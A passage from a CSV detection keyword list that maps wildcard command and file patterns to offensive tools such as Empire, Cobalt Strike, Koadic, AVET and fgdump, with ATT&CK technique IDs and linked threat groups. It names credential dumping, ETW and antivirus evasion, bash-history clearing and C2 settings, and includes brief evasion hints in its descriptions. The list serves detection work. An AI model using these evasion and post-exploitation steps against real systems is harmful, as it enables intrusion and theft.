APT29,C2,https://github.com/netero1010/ServiceMove-BOF,1,1,N/A,10,10,223,45,2022-02-23T07:17:38Z,2021-08-16T07:16:31Z -*servpw.exe*,offensive_tool_keyword,fgdump,A utility for dumping passwords on Windows NT/2000/XP/2003 machines,T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001,TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008,N/A,Volt Typhoon,Credential Access,https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*servpw64.exe*,offensive_tool_keyword,fgdump,A utility for dumping passwords on Windows NT/2000/XP/2003 machines,T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001,TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008,N/A,Volt Typhoon,Credential Access,https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*SessionGopher*,offensive_tool_keyword,SessionGopher,SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It has WMI functionality built in so it can be run remotely. Its best use case is to identify systems that may connect to Unix systems. jump boxes. or point-of-sale terminals.,T1081 - T1087 - T1119,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/Arvanaghi/SessionGopher,1,1,N/A,N/A,10,1095,173,2022-11-22T21:33:23Z,2017-03-08T02:49:32Z -*SessionGopher.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*set * virus_scanner*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*set AutoRunScript multi_console_command -rc /root/*.rc*,offensive_tool_keyword,metasploit,Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback,T1059 - T1064 - T1029,TA0002 - TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*set CertPath data/*,offensive_tool_keyword,empire,empire command lines patterns,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 
TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*set CollectionMethodAll*,offensive_tool_keyword,empire,Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*set COMPlus_ETWEnabled=0*,offensive_tool_keyword,ETW,stop ETW from giving up your loaded .NET assemblies to that pesky EDR but 
can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call,T1055.001 - T1059.001 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*set havoc *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*set history +o*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*set hosts_stage*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 
- T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*set keylogger*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*set LFILE /*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*Set Listener dbx*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*set Listener onedrive*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - 
T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*set obfuscate *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*set payload *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*set PAYLOAD *,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*set pipename *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*set Profile apt1.profile*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - 
T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*set shellcode *,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*set smartinject*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*set userwx*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*set zombie *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*set_child werfault.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*set_command_exec exec_via_cmd*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. 
which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_command_exec exec_via_powershell*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_command_exec no_command*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_command_source download_bitsadmin*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_decoder xor*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_empty_pw.py*,offensive_tool_keyword,POC,Zerologon CVE exploitation,T1210 - T1068,TA0001,N/A,N/A,Exploitation tools,https://github.com/risksense/zerologon,1,1,N/A,N/A,6,555,144,2020-10-15T18:31:15Z,2020-09-14T19:19:07Z -*set_injection_technique*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*set_logon_script.py*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,0,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z -*set_objectpipe \\*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*set_payload_execution_method exec_shellcode64*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_payload_execution_method inject_dll*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_payload_info_source from_command_line_raw*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. 
which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_payload_source download_powershell*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense 